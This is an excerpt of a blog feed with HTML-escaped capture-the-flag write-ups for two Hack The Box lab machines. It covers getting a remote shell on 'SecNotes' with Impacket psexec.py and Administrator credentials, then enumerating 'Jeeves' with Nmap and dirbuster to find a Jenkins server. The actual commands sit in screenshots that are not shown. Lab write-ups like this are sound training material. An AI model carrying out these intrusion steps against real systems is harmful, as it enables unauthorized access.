&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMgroXV82lkr_gULPelgC_DExd-wTstjYnjI7UZLJ-uGdZNT4lG62b9S-kg7tbY1fFaNkjsEWKzQ2kgxbIUK-HUMtPmcsP3seRp9bBOnMBuqZueq7kyy2MZvDcu_ZrUvvMLYRAYEIcGm0S/s1600/screenshot.45.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMgroXV82lkr_gULPelgC_DExd-wTstjYnjI7UZLJ-uGdZNT4lG62b9S-kg7tbY1fFaNkjsEWKzQ2kgxbIUK-HUMtPmcsP3seRp9bBOnMBuqZueq7kyy2MZvDcu_ZrUvvMLYRAYEIcGm0S/s1600/screenshot.45.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAdqwjqcrjr9RUczhVJzRiqtNpBQNV0myUJ4IQE3SYf2sLr3C2FdV2dtvm4WnfVmqcdDE9nqOOX0Vy2XRjyQfUaXSvqk-9e2vrXcAtkyfJ0ZAerbGj3EqsnZZPL6Eu4DTFyIoAeyIozVo2/s1600/screenshot.46.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAdqwjqcrjr9RUczhVJzRiqtNpBQNV0myUJ4IQE3SYf2sLr3C2FdV2dtvm4WnfVmqcdDE9nqOOX0Vy2XRjyQfUaXSvqk-9e2vrXcAtkyfJ0ZAerbGj3EqsnZZPL6Eu4DTFyIoAeyIozVo2/s1600/screenshot.46.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;5.2 - Psexec.py&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The Impacket &lt;b&gt;Psexec.py&lt;/b&gt;&amp;nbsp;Python script helps to get a remote &lt;b&gt;root&lt;/b&gt; shell, just by providing credentials for &lt;b&gt;Administrator&lt;/b&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyEUZB495l7KuQg1DhyCJ4mQSM7lM4Dy5ML69yBkY5FLYuiBVRTSjJpEQHEXkbM8f2sRWOtl5OsuckzVPd9LVZPvwUvOxS83mrBgARoLcpRmIyoSiwAmQ_qVlspIOrBPDfkNpVmDOu3h8Y/s1600/screenshot.49.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyEUZB495l7KuQg1DhyCJ4mQSM7lM4Dy5ML69yBkY5FLYuiBVRTSjJpEQHEXkbM8f2sRWOtl5OsuckzVPd9LVZPvwUvOxS83mrBgARoLcpRmIyoSiwAmQ_qVlspIOrBPDfkNpVmDOu3h8Y/s1600/screenshot.49.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;6 - CAPTURING THE 2nd FLAG&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- So we have two options to read &lt;b&gt;root.txt&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- First, transferring &lt;b&gt;root.txt&lt;/b&gt; from SecNotes to Kali and reading it locally:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhZfsqqjJvNxg87zd8IGb0Dajw0sYEiutvORzDBuaM8CnvaKkLNKpKlMEGQPUjiYjNPh6SMmk4_4Z44JLEfe8tSe1xFsmpR0OXgkFfnyWkZpu47r4oVGD1m7wCT0Tu5DQwOZ0iugI5ShJb/s1600/screenshot.47.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhZfsqqjJvNxg87zd8IGb0Dajw0sYEiutvORzDBuaM8CnvaKkLNKpKlMEGQPUjiYjNPh6SMmk4_4Z44JLEfe8tSe1xFsmpR0OXgkFfnyWkZpu47r4oVGD1m7wCT0Tu5DQwOZ0iugI5ShJb/s1600/screenshot.47.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFXQnmgc526zpN70VikI6lu0oyeQyTnQ7Di-m6Wr8zJuRm1UpyCI9duXQfCO0efSXNgeBV0O1O-DWCZtDNme9M3SXoaV9tFNug5cS-ynkFOaEpABKgh7IYbv46SnyS2DhiO4IVQOxTUX75/s1600/screenshot.48.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFXQnmgc526zpN70VikI6lu0oyeQyTnQ7Di-m6Wr8zJuRm1UpyCI9duXQfCO0efSXNgeBV0O1O-DWCZtDNme9M3SXoaV9tFNug5cS-ynkFOaEpABKgh7IYbv46SnyS2DhiO4IVQOxTUX75/s1600/screenshot.48.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Second, reading it from the remote root shell:&lt;/span&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOgTkkpNZp7rfm8L4NBcLqFjLFvIk08gIgNtsgVqnc6FCs7O22MhiqIxSgWifyla40Ei6tEUC0xuzLJSSkaEQnOd4PjbQAOJK7wGHMlgUi_W3kQpMu2IOSgK32jO-8RA9DGj7EzGec1PC7/s1600/screenshot.50.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOgTkkpNZp7rfm8L4NBcLqFjLFvIk08gIgNtsgVqnc6FCs7O22MhiqIxSgWifyla40Ei6tEUC0xuzLJSSkaEQnOd4PjbQAOJK7wGHMlgUi_W3kQpMu2IOSgK32jO-8RA9DGj7EzGec1PC7/s1600/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/6286439826555516368'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/6286439826555516368'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2019/07/secnotes.html' title='SecNotes'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxsxZydf6mjIDuiODu54EZutXZQaGy0ELGKWAb6QQ5NFcbT708EHeujKULcnyJ6Zm9muZfpItWt55pdKW7RJTt7vfApyGqV4AU2424duAVDrAUjmwaaOe9qcvw0qAFgBXWgUfkHuAdp15L/s72-c/screenshot.51.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-1255548117836607867</id><published>2019-07-30T11:18:00.000-05:00</published><updated>2019-08-03T11:18:23.217-05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Jeeves</title><content type='html'>&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;JEEVES&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tfn6jFUi1HVBu90HKpNEzxKcpQIy9Br82Z1whaTNbSOWnAlEE6qfNVB9hGjym4JGo5ZMcT4exYw2cAUbUNFC3drX4hnHONUqmfnsG7Bp4nc6U2HekT2s5hPlA9Si5J3rt_bW0d4ccurY/s1600/screenshot.52.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tfn6jFUi1HVBu90HKpNEzxKcpQIy9Br82Z1whaTNbSOWnAlEE6qfNVB9hGjym4JGo5ZMcT4exYw2cAUbUNFC3drX4hnHONUqmfnsG7Bp4nc6U2HekT2s5hPlA9Si5J3rt_bW0d4ccurY/s1600/screenshot.52.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The goal for this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Jeeves&lt;/b&gt; from the Hack The Box pentesting platform:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://www.hackthebox.eu/&quot;&gt;https://www.hackthebox.eu&lt;/a&gt;/&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- &lt;b&gt;Jeeves&lt;/b&gt;&#39;s IP is 10.10.10.63:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWV_YJKDtlffi6xKCW3k9BSosHts5OuX1Gv4Z8ILahVozYgO5ND3U439aUkLTM3d0fCpTLjB2Cl9jLHWiCUP5sPiUNfEp11MPQvSDpxbbBNIN-TYlSaMjIj_Sdml2wW4W134m5qCZBofYr/s1600/screenshot.2.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWV_YJKDtlffi6xKCW3k9BSosHts5OuX1Gv4Z8ILahVozYgO5ND3U439aUkLTM3d0fCpTLjB2Cl9jLHWiCUP5sPiUNfEp11MPQvSDpxbbBNIN-TYlSaMjIj_Sdml2wW4W134m5qCZBofYr/s400/screenshot.2.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9_Up2Q_ogiRLzy-em2v9-kiZKkbLDZtJOMiE3m3GCACbNApMopXXv2ocbYAihWGAdtUSVHev1kW3fok3dPUJQWnytG0ClJD5FTb4b-nmOAgOqgEbIDjDi7NmWKsJ2Fwo3Jw_yRKLSFz0H/s1600/screenshot.3.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9_Up2Q_ogiRLzy-em2v9-kiZKkbLDZtJOMiE3m3GCACbNApMopXXv2ocbYAihWGAdtUSVHev1kW3fok3dPUJQWnytG0ClJD5FTb4b-nmOAgOqgEbIDjDi7NmWKsJ2Fwo3Jw_yRKLSFz0H/s1600/screenshot.3.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Connecting to the web server on port 80:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwYu_U1GEdPTpDr8uV9zsSEXVXuNFA3F92ySis407RL4N2ljpmk443ao1Y4L7MhZXWfeS5DF4a2eV7VfickMxz4NR02UGi8pFbJxqj61Hzrpw_CKm8TQaHbTTguSJ_Uj4sbU6M6GJcuOn/s1600/screenshot.4.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwYu_U1GEdPTpDr8uV9zsSEXVXuNFA3F92ySis407RL4N2ljpmk443ao1Y4L7MhZXWfeS5DF4a2eV7VfickMxz4NR02UGi8pFbJxqj61Hzrpw_CKm8TQaHbTTguSJ_Uj4sbU6M6GJcuOn/s1600/screenshot.4.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Connecting to the web server on port 50000:&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSFHJ9p-Q_njME5gWfciTJ8gkYPD_VS6BIpMjulJstNAmLYTu5h8eqiLblImSrCrhgBBLJ1lTgYBjQthJ9TlgBb0wMd0HiYG6yefecjADU_zf4hKQohlm4rRNTjfYT7hKHrMlqldhbq08u/s1600/screenshot.5.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSFHJ9p-Q_njME5gWfciTJ8gkYPD_VS6BIpMjulJstNAmLYTu5h8eqiLblImSrCrhgBBLJ1lTgYBjQthJ9TlgBb0wMd0HiYG6yefecjADU_zf4hKQohlm4rRNTjfYT7hKHrMlqldhbq08u/s1600/screenshot.5.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Applying &lt;b&gt;dirbuster&lt;/b&gt; to both web servers we find the folder &lt;b&gt;askjeeves&lt;/b&gt; on port 50000:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGP1EbEGWwSkQX8JFv0rI_4ERX0xgi0K8qmGj0hUHT_MQakTY1Y_4ik4YRGNPFTJYE358HMPVlJXH4FWCQiUoQNn2uHTbaPI6o_hYyc9V0zoTLEItdWlvGwgLCzSBH3wzcy_srSUZWln5X/s1600/screenshot.7.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGP1EbEGWwSkQX8JFv0rI_4ERX0xgi0K8qmGj0hUHT_MQakTY1Y_4ik4YRGNPFTJYE358HMPVlJXH4FWCQiUoQNn2uHTbaPI6o_hYyc9V0zoTLEItdWlvGwgLCzSBH3wzcy_srSUZWln5X/s1600/screenshot.7.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQgevsrQ0yQhTOzX79rUmHhQSiHc-aeSBZtqR5tWnEAcwqn9gAsB81s19x2wn7-5bERcEHvPf-Tpl4UoTF1IxEdcMgFYz8St0_LN0Pe4C8CM8swXOp_G2aRMWp_i60sG8HDnOaIhXClAmV/s1600/screenshot.8.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQgevsrQ0yQhTOzX79rUmHhQSiHc-aeSBZtqR5tWnEAcwqn9gAsB81s19x2wn7-5bERcEHvPf-Tpl4UoTF1IxEdcMgFYz8St0_LN0Pe4C8CM8swXOp_G2aRMWp_i60sG8HDnOaIhXClAmV/s1600/screenshot.8.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Browsing &lt;b&gt;/askjeeves&lt;/b&gt; we find a &lt;b&gt;Jenkins&lt;/b&gt; server.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- &lt;b&gt;Jenkins&lt;/b&gt; is an open source automation server which enables developers around the world to reliably build, test, and deploy their software:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://jenkins.io/&quot;&gt;https://jenkins.io/&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ8W6guY8-DDs2KtduKpUAKkl_zBW8rbLynWTBlMhItLlfdZCaXYG8rbvjwsRArCfussTV4G6-mgRheCI8Gl0HVxUf0xhm8pJpLlcIDXyXsBwOhqKO3cVjH8fP-anUShOjvM1muCGPXyyj/s1600/screenshot.9.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ8W6guY8-DDs2KtduKpUAKkl_zBW8rbLynWTBlMhItLlfdZCaXYG8rbvjwsRArCfussTV4G6-mgRheCI8Gl0HVxUf0xhm8pJpLlcIDXyXsBwOhqKO3cVjH8fP-anUShOjvM1muCGPXyyj/s1600/screenshot.9.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
